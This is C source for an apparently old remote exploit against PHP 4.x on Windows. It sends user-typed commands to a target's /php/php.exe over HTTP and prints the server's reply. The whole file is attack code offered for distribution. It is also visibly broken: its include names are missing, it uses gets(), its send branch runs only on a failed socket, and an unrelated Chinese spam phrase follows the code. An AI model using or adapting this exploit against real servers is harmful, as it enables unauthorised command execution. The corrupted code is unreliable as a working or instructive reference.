/* concept.c By NTFX * Some code borrowed from an old iis exploit. * * Vulnerable systems: * PHP version 4.1.1 under Windows * PHP version 4.0.4 under Windows * * (c) Legion2000 Security Research , code may be distributed * credit is greatfully given if so.. * Greets: opt1k, I-L, EazyMoney, SpyModem * * Does this work? you tell me. * http://www.legion2000.net http://www.spymodem.com */ #include #include #include #include #include #include #include #include int main(int argc, char **argv){ char buffer[1024]; char buf[500]; char rcvbuf[8192]; int i, sock, result; struct sockaddr_in name; struct hostent *hostinfo; if (argc < 2){ printf ("To use type %s /dir/file.executable\n", argv[0]); printf ("Author: NTFX NTX@SpyModem.Com\n"); printf ("Legion2000 Security Research (c)"); printf ("\n\n"); exit(0); } for (;;) { printf ("to exit type erm.. exit!"); printf ("\n\n"); printf ("[enter@cmd /here]#"); gets(buf); if (strstr(buf, "exit")) exit(0); i=0; while (buf[i] != '\0'){ if(buf[i] == 32) buf[i] = 43; i++; } hostinfo=gethostbyname(argv[1]); name.sin_family=AF_INET; name.sin_port=htons(80); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (sock < 0){ strcpy(buffer,"GET /php/php.exe?"); strcat(buffer,buf); strcat(buffer, " HTTP/1.0\n\n"); send(sock, buffer, sizeof(buffer), 0); recv(sock, rcvbuf, sizeof(rcvbuf), 0); printf ("%s", rcvbuf); close(sock); } }; };

亚洲欧美在线